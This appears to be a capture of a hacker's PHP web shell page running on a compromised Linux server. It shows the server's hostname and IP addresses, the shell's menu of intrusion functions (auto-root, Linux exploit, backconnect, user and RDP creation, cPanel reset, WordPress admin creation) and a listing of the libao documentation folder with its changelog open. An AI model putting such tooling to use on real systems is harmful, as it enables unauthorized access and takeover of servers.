Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libao-1.1.0 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
115
B
-rw-r--r--
CHANGES
3.75
KB
-rw-r--r--
COPYING
17.57
KB
-rw-r--r--
README
3.03
KB
-rw-r--r--
ao_append_option.html
1.72
KB
-rw-r--r--
ao_close.html
1.58
KB
-rw-r--r--
ao_default_driver_id.html
1.59
KB
-rw-r--r--
ao_device.html
1.2
KB
-rw-r--r--
ao_driver_id.html
1.5
KB
-rw-r--r--
ao_driver_info.html
1.62
KB
-rw-r--r--
ao_driver_info_list.html
1.54
KB
-rw-r--r--
ao_example.c
1.78
KB
-rw-r--r--
ao_file_extension.html
1.72
KB
-rw-r--r--
ao_free_options.html
1.31
KB
-rw-r--r--
ao_info.html
2.83
KB
-rw-r--r--
ao_initialize.html
2.03
KB
-rw-r--r--
ao_is_big_endian.html
1.32
KB
-rw-r--r--
ao_open_file.html
3.23
KB
-rw-r--r--
ao_open_live.html
2.54
KB
-rw-r--r--
ao_option.html
1.49
KB
-rw-r--r--
ao_play.html
1.76
KB
-rw-r--r--
ao_plugin_close.html
1.49
KB
-rw-r--r--
ao_plugin_device_clear.html
1.24
KB
-rw-r--r--
ao_plugin_device_init.html
3.35
KB
-rw-r--r--
ao_plugin_driver_info.html
1.26
KB
-rw-r--r--
ao_plugin_file_extension.html
1.51
KB
-rw-r--r--
ao_plugin_open.html
3.15
KB
-rw-r--r--
ao_plugin_play.html
1.79
KB
-rw-r--r--
ao_plugin_set_option.html
1.98
KB
-rw-r--r--
ao_plugin_test.html
1.46
KB
-rw-r--r--
ao_sample_format.html
5.5
KB
-rw-r--r--
ao_shutdown.html
1.34
KB
-rw-r--r--
config.html
2.91
KB
-rw-r--r--
drivers.html
11.76
KB
-rw-r--r--
index.html
1.67
KB
-rw-r--r--
libao-api.html
1.99
KB
-rw-r--r--
overview.html
3.58
KB
-rw-r--r--
plugin-api.html
1.38
KB
-rw-r--r--
plugin-overview.html
7.16
KB
-rw-r--r--
style.css
279
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CHANGES
1.1.0 - February 21, 2011 - Add autofoo ld symbol versioning to build system - Update Roar driver to latest API - Fix Roar driver to not block on SLP lookup during probe - Improve/correct latency setup in ALSA (see Trac #1762) - Add missing ctype.h header in build (see Trac #1760) - Move toward more consistent option naming across drivers - Fix Mac OS X AUHAL support to properly handle suspend/wakeup, headphone plug/unplug, other hardware events - Correct ao_example.c source to not pass dangling pointer for the matrix argument. - Add 24 bit playback to Pulse plugin - Fix 24 bit playback in ALSA plugin - Fix segfaults when closing a driver that did not successfully open. - Fix compilation of sndio plugin - Fix building Mac OS X driver AUHAL compilation for 10.5, restore Mac OS X 10.4 support 1.0.0 - March 25, 2010 - AO returns to active development - Added surround channel mapping API and capability - Update and test all drivers on modern installs - New config file options - Driver options may be specifid in config file - Support for MacosX < 10.5 dropped, driver modded to AUHAL - Build in WMM driver rather than using dlopen() - Added Roar Audio driver - Added OpenBSD SNDIO driver - Work around ESD non-4096 byte write bug - Work around aRts server crash bug - Workaround for VIA82xx click/crackle bugs under ALSA - Remove dead/unused drivers (solaris, alasa05, mmsound) - Numerous patches from multiple downstreams 0.8.8 - May 24, 2007 - New win32 driver - Few fixes and changes in autotools and configuration files. 0.8.7 - unreleased snapshot - obsolete alsa device renamed to alsa05 - the 'alsa' device now uses the 0.9/1.0 API - ALSA driver fixes 0.8.6 - January 11, 2005 - Added Polypaudio driver(libao-polyp 0.4) from Lennart Poettering <mzyvonbcbylc (at) 0pointer (dot) de> - Use esd_close() in the esd driver - Broaden sample rate tolerance in the OSS driver for nForce compatibility 0.8.5 - March 19, 2004 - Support now for the ALSA 1.0 API - Can build with --disable-esd option again - Minor build fixes - ALSA mmap() mode can be enabled/disabled at runtime using "use_mmap" option. - Patch to OSS plugin to fix skipping issues with some drivers (like emu10k1). 0.8.4 - October 4, 2003 - Added AIX sound driver from Stefan Tibus <sjti@gmx.net> - Committed some fixes from the Fink project to allow compiling on OS X (still with all the dlcompat stuff) - Improvements in plugin detection code by David Walser, especially when ESD or aRts are present. - NAS plugin from Antoine Mathys. - Portability fixes for various platforms (including dlopen() bugs) including HP-UX and *BSD. - Memory/resource leak fixes - Significant fixes to ALSA 0.9.x plugin by Kevin Cody, Jr. This should fix stuttering audio for mpg321 users. The --enable-alsa09-mmap option to ./configure turns on memory-mapped I/O. Note this is an experimental feature and causes some problems with some sound card drivers and also users of the dmix software mixer. 0.8.3 - July 2002 - fix to ao.m4 macro - minor alsa09 plugin updates - fixes to irix plugin 0.8.2 - December 2001 - alsa09 plugin updated 0.8.0 - August 2000 - Major API rewrite. Old apps and plugins will not work with this library! - Default driver detection now works. - /etc/libao.conf and ~/.libao config files now supported, see libao.conf man page for details. - WAV files can now be piped to non-picky applications. (Please don't complain if this fails. You shouldn't be using be using WAV for this anyway.) - Various portability fixes for Solaris and *BSD. 0.7.0 - June 2000 - minor build fixes for different platforms 0.6.0 - December 2000 - slight api modification with ao_append_option() - fixed an option leak 0.5.0 - November 2000 - first official release under the Xiphophorus projects
Close